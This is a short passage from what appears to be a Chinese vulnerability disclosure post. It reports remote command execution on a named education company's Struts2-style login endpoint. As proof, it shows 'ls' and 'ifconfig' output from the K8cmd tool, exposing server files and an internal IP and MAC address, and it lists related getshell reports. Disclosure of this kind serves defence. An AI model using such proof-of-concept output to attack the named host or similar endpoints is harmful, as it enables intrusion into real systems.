code 区域 http://e.sunlands.com:8088/back/login!receptionIndex.action 漏洞证明： code 区域 ★K8cmd-> ls ==================================================================================================================================== bootstrap.jar catalina.bat catalina.sh catalina-tasks.xml commons-daemon.jar commons-daemon-native.tar.gz cpappend.bat d: digest.bat digest.sh http%3A%2F%2Fusr%2Flocal%2Ftomcat_dap%2Fwebapps%2Fdap%2FWEB-INF%2Fclasses%2Fcom%2Fdap%2Fresolve%2Fhtml%2Futil%2FhtmlFile%2FoneNum.jpg http%3A%2F%2Fusr%2Flocal%2Ftomcat_dap%2Fwebapps%2FROOT%2FWEB-INF%2Fclasses%2Fcom%2Fdap%2Fresolve%2Fhtml%2Futil%2FhtmlFile%2FoneNum.jpg jsvc jsvc-src jsvc.tar_.gz logs setclasspath.bat setclasspath.sh shutdown.bat shutdown.sh startup.bat startup.sh tomcat-juli.jar tomcat-native.tar.gz tool-wrapper.bat tool-wrapper.sh version.bat version.sh ★K8cmd-> ifconfig ==================================================================================================================================== eth0 Link encap:Ethernet HWaddr 78:2B:CB:18:CC:D0 inet addr:172.16.119.10 Bcast:172.16.119.255 Mask:255.255.254.0 inet6 addr: fe80::7a2b:cbff:fe18:ccd0/64 Scope:Link UP BROADCAST […]

您可能也喜欢：
尚德机构某分站远程命令大量执行 以获得webshell	莱克斯科技上网行为管理系统root命令执行	广东某市社保卡系统存在命令执行漏洞导致getshell（泄露大量信息）	电信DNS劫持跳转的站点存在Struts2远程命令执行漏洞	某知名WebGame官网存在命令执行漏洞
无觅